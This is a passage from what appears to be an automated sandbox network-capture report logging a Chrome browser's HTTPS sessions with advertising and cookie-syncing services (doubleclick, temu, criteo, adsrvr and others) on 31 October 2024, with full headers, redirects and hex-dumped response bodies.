                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      Cookie: production=42792e3cde3b100032f83ab40466
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC410INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      Set-Cookie: production=42792e3cde3b100032f83ab40466; HttpOnly; SameSite=None; Secure; Expires=Wed Jan 29 2025 18:19:35 GMT+0000 (Coordinated Universal Time); Max-Age=7776000; path=/; domain=.e-volution.ai;
                                                                                                                                                                                                                                                                                                                      Location: https://cm.g.doubleclick.net/pixel?google_nid=309242622&google_hm=42792e3cde3b100032f83ab40466
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:35 GMT
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Content-Length: 0


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      52192.168.2.44988420.157.217.1184437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC773OUTGET /api/adx/cm/pixel?google_gid=CAESENYT61gwLXGsOhmLZBLf7tE&google_cver=1&google_push=AXcoOmSwaAEJs2KOmCEYVvFDTykRMfzP5EgxESu2Kp_CNP1qYCwsJSzte81WmXDP9HOJ6CmStE9CMEmJ5PqfvDw16JSgB3T_dmeec4Dc4Q HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: www.temu.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC770INHTTP/1.1 302
                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:35 GMT
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Location: https://cm.g.doubleclick.net/pixel?google_nid=whaleco_services_llc&google_push=AXcoOmSwaAEJs2KOmCEYVvFDTykRMfzP5EgxESu2Kp_CNP1qYCwsJSzte81WmXDP9HOJ6CmStE9CMEmJ5PqfvDw16JSgB3T_dmeec4Dc4Q
                                                                                                                                                                                                                                                                                                                      Content-Language: en-US
                                                                                                                                                                                                                                                                                                                      x-gateway-request-id: 1730398775722-2cd38e3003f9524655c08044ca4f6111
                                                                                                                                                                                                                                                                                                                      strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                      content-security-policy-report-only: default-src 'none';script-src 'report-sample';report-uri /api/sec-csp/110000007/sec-gif
                                                                                                                                                                                                                                                                                                                      yak-timeinfo: 1730398775722|3
                                                                                                                                                                                                                                                                                                                      Set-Cookie: api_uid=Cm3EDmcjyjcQBQBVqfixAg==; expires=Fri, 31-Oct-25 18:19:35 GMT; domain=.temu.com; path=/; secure
                                                                                                                                                                                                                                                                                                                      cip: 173.254.250.77
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=604800


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      53192.168.2.449883174.137.133.494437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC825OUTGET /sync?exchange=11&google_gid=CAESEBNhaeuSmOpsq07SBs2IyhE&google_cver=1&google_push=AXcoOmTePKwToHaeIQGu8M56gWDzY-1geiWnlUHfQIpsbYld60Ki_rzZaP9OaIWvTKZwgr332ljGgxcxDcFPggPWRaGld0nzhuAzAeO9 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: dsp.adkernel.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      Cookie: ADK_EX_11=1; ADKUID=A8836978867793438466
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC539INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:35 GMT
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Set-Cookie: ADK_EX_11=1; Max-Age=1209600; Domain=.adkernel.com; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Set-Cookie: ADKUID=A8836978867793438466; Max-Age=2592000; Domain=.adkernel.com; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Location: https://cm.g.doubleclick.net/pixel?google_nid=adkernel&google_hm=QTg4MzY5Nzg4Njc3OTM0Mzg0NjY&google_push=AXcoOmTePKwToHaeIQGu8M56gWDzY-1geiWnlUHfQIpsbYld60Ki_rzZaP9OaIWvTKZwgr332ljGgxcxDcFPggPWRaGld0nzhuAzAeO9


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      54192.168.2.449890178.250.1.94437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC908OUTGET /dis/usersync.aspx?r=4&p=14&cp=google&cu=1&url=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dcjp%26google_hm%3D%40%40CRITEO_USERID%40%40%26google_push%3DAXcoOmQ1NvIkBuiezRP4VyO1tot_Yk-dOVvINUBM4mZHt7YSmwC9oik7a2vt6010qe8UdTECB7DIt_PBPnp2mLudoQCl_f0ZmP97TYXp&google_gid=CAESEBG-T-imfgN0jPbZ2bYvkgg&google_cver=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: dis.criteo.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC575INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                                                                                                      date: Thu, 31 Oct 2024 18:19:35 GMT
                                                                                                                                                                                                                                                                                                                      server: Kestrel
                                                                                                                                                                                                                                                                                                                      location: https://widget.us.criteo.com/dis/usersync.aspx?r=4&p=14&cp=google&cu=1&url=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dcjp%26google_hm%3D%40%40CRITEO_USERID%40%40%26google_push%3DAXcoOmQ1NvIkBuiezRP4VyO1tot_Yk-dOVvINUBM4mZHt7YSmwC9oik7a2vt6010qe8UdTECB7DIt_PBPnp2mLudoQCl_f0ZmP97TYXp&google_gid=CAESEBG-T-imfgN0jPbZ2bYvkgg&google_cver=1
                                                                                                                                                                                                                                                                                                                      server-processing-duration-in-ticks: 60513
                                                                                                                                                                                                                                                                                                                      strict-transport-security: max-age=31536000; preload;
                                                                                                                                                                                                                                                                                                                      connection: close


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      55192.168.2.44989135.214.168.804437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC774OUTGET /ju/cs/google?google_gid=CAESEI1qM-uapk6ijqCEkmvquJE&google_cver=1&google_push=AXcoOmQzdVcA5PSUWiPvj9qwcPXZXVb8HNbTivNbTzQifDQck24kFKR7TStxtgxFXn-j4k3gshyw_znnZgyV57zTXchMvGa5P0ZnjS-k9g HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: gtrace.mediago.io
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC702INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: Content-Type
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                                      Location: https://cm.g.doubleclick.net/pixel?google_nid=baidu_mediago&google_push=AXcoOmQzdVcA5PSUWiPvj9qwcPXZXVb8HNbTivNbTzQifDQck24kFKR7TStxtgxFXn-j4k3gshyw_znnZgyV57zTXchMvGa5P0ZnjS-k9g&google_hm=22210ca75dc45a302agr4j00m2xmr4i5
                                                                                                                                                                                                                                                                                                                      Set-Cookie: __mguid_=22210ca75dc45a302agr4j00m2xmr4i5; Path=/; Domain=mediago.io; Max-Age=31536000; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:35 GMT
                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC8INData Raw: 72 65 64 69 72 65 63 74
                                                                                                                                                                                                                                                                                                                      Data Ascii: redirect


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      56192.168.2.44989635.204.158.494437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC763OUTGET /gp_match?google_gid=CAESEAH4BonoisDzvjD0eD3Gsmw&google_cver=1&google_push=AXcoOmSsQrt-_qiBrr6OIHfpWMD-3_UYpvvZqW8G6sH9gjdwVNowHfTsgvspPMInOQti-TkQ0oB5OJiwg4bv4pExTTZs6MqwMVAtC6Uq HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: um.simpli.fi
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC1035INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                      Server: openresty
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:35 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                      Content-Length: 142
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Set-Cookie: suid=336FAC20C30146ADB0C6F6BCF75A840A; Path=/; domain=simpli.fi; Expires=Sat, 01-Nov-25 18:19:35 GMT; SameSite=none; Secure;
                                                                                                                                                                                                                                                                                                                      Set-Cookie: suid_legacy=336FAC20C30146ADB0C6F6BCF75A840A; Path=/; domain=simpli.fi; Expires=Sat, 01-Nov-25 18:19:35 GMT; Secure;
                                                                                                                                                                                                                                                                                                                      Location: https://cm.g.doubleclick.net/pixel?google_nid=simplifi&google_hm=336FAC20C30146ADB0C6F6BCF75A840A&google_push=AXcoOmSsQrt-_qiBrr6OIHfpWMD-3_UYpvvZqW8G6sH9gjdwVNowHfTsgvspPMInOQti-TkQ0oB5OJiwg4bv4pExTTZs6MqwMVAtC6Uq
                                                                                                                                                                                                                                                                                                                      Expires: Wed, 30 Oct 2024 18:19:35 GMT
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: DNT,X-Mx-ReqToken,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC142INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      57192.168.2.44989854.170.20.2054437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC776OUTGET /cookie-sync/adx?google_gid=CAESEDiYK4sqMzOUbRWTRd1nDCw&google_cver=1&google_push=AXcoOmTo2EAoqgbbw2Cb7fAUVP11_HvIEeWtIz6kljuEJPQ-1zPelC1FFe0JAUhRlBsW8tvUPC7tKMRWC2hCdktOiSxuOb6V8OXC1zof HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: match.prod.bidr.io
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC538INHTTP/1.1 303 See Other
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:35 GMT
                                                                                                                                                                                                                                                                                                                      location: https://match.prod.bidr.io/cookie-sync/adx?google_gid=CAESEDiYK4sqMzOUbRWTRd1nDCw&google_cver=1&google_push=AXcoOmTo2EAoqgbbw2Cb7fAUVP11_HvIEeWtIz6kljuEJPQ-1zPelC1FFe0JAUhRlBsW8tvUPC7tKMRWC2hCdktOiSxuOb6V8OXC1zof&_bee_ppp=1
                                                                                                                                                                                                                                                                                                                      Server: gunicorn
                                                                                                                                                                                                                                                                                                                      set-cookie: checkForPermission=ok; Domain=bidr.io; expires=Thu, 31 Oct 2024 18:29:35 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                      strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      Connection: Close


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      58192.168.2.44988835.71.131.1374437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC775OUTGET /track/cmf/google?google_gid=CAESELJu5-7ezmiSZQVy8-_oFDQ&google_cver=1&google_push=AXcoOmRx0KuDS_5o9Zy6vJW0KAWcooCxdmf_izsR3SRJiVhg6QBKvaasyHJxXO09-1UoZ8_V-EKFl_9_C3vcmkaDrVzPGOLrd9VN9N3E HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: match.adsrvr.org
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC622INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:35 GMT
                                                                                                                                                                                                                                                                                                                      Content-Length: 453
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      server: Kestrel
                                                                                                                                                                                                                                                                                                                      location: https://match.adsrvr.org/track/cmb/google?google_gid=CAESELJu5-7ezmiSZQVy8-_oFDQ&google_cver=1&google_push=AXcoOmRx0KuDS_5o9Zy6vJW0KAWcooCxdmf_izsR3SRJiVhg6QBKvaasyHJxXO09-1UoZ8_V-EKFl_9_C3vcmkaDrVzPGOLrd9VN9N3E
                                                                                                                                                                                                                                                                                                                      set-cookie: TDID=d1b817e5-56c5-45f4-864e-634d6431975b; expires=Fri, 31 Oct 2025 18:19:35 GMT; domain=.adsrvr.org; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                                                                      set-cookie: TDCPM=CAEYBSgCMgsI-O_s4-n4vD0QBTgB; expires=Fri, 31 Oct 2025 18:19:35 GMT; domain=.adsrvr.org; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC453INData Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 74 63 68 2e 61 64 73 72 76 72 2e 6f 72 67 2f 74 72 61 63 6b 2f 63 6d 62 2f 67 6f 6f 67 6c 65 3f 67 6f 6f 67 6c 65 5f 67 69 64 3d 43 41 45 53 45 4c 4a 75 35 2d 37 65 7a 6d 69 53 5a 51 56 79 38 2d 5f 6f 46 44 51 26 67 6f 6f 67 6c 65 5f 63 76 65 72 3d 31 26 67 6f 6f 67 6c 65 5f 70 75 73 68 3d 41 58 63 6f 4f 6d 52 78 30 4b 75 44 53 5f 35 6f 39 5a 79 36 76 4a 57 30 4b 41 57 63 6f 6f 43 78 64 6d 66 5f 69 7a 73 52 33 53 52 4a 69 56 68 67 36 51 42 4b 76 61 61 73 79 48 4a 78 58 4f 30 39 2d 31 55 6f 5a 38 5f 56 2d 45 4b 46 6c 5f 39 5f 43 33 76 63 6d 6b 61 44 72 56 7a 50 47 4f 4c 72 64 39 56 4e 39 4e 33 45 22 3e 68 74 74 70 73 3a 2f 2f 6d 61 74 63 68 2e 61 64 73
                                                                                                                                                                                                                                                                                                                      Data Ascii: Redirecting to: <a href="https://match.adsrvr.org/track/cmb/google?google_gid=CAESELJu5-7ezmiSZQVy8-_oFDQ&google_cver=1&google_push=AXcoOmRx0KuDS_5o9Zy6vJW0KAWcooCxdmf_izsR3SRJiVhg6QBKvaasyHJxXO09-1UoZ8_V-EKFl_9_C3vcmkaDrVzPGOLrd9VN9N3E">https://match.ads


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      59192.168.2.449893172.217.18.44437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC804OUTGET /ads/measurement/l?ebcid=ALh7CaT6FXIFvZW0DewpsEqJBJb-MJQr7sID113NOOXgib0Cx-XeGuKQUcr0n_lcem5uugkeRxWKqm8lNexqlA8pQp9GUBq5lQ HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://googleads.g.doubleclick.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:35 UTC314INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:35 GMT
                                                                                                                                                                                                                                                                                                                      Server: jumble_frontend_server
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      60192.168.2.44990135.214.168.804437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
